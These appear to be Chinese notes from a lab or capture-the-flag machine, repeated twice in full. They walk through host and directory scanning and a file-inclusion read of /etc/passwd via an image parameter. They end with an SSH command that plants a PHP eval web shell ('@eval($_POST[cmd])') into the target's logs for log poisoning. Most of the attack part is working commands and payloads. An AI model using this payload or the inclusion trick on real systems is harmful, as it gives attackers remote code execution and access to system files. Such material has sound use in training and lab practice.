1.主机探测
2.目录扫描
antibot_image/这个页面有目录遍历
有info.php
f12看源代码可能存在文件包含
在url后面输入?image=/etc/passwd 有回显存在文件包含
3.端口扫描
8888端口有一个登录框
2211是一个远程连接
kali不行用centos系统通过ssh把木马写入到日志里面
ssh '<?php @eval($_POST[cmd]); ?>'@192.168.182.169 -p 2211
1.主机探测
2.目录扫描
antibot_image/这个页面有目录遍历
有info.php
f12看源代码可能存在文件包含
在url后面输入?image=/etc/passwd 有回显存在文件包含
3.端口扫描
8888端口有一个登录框
2211是一个远程连接
kali不行用centos系统通过ssh把木马写入到日志里面
ssh '<?php @eval($_POST[cmd]); ?>'@192.168.182.169 -p 2211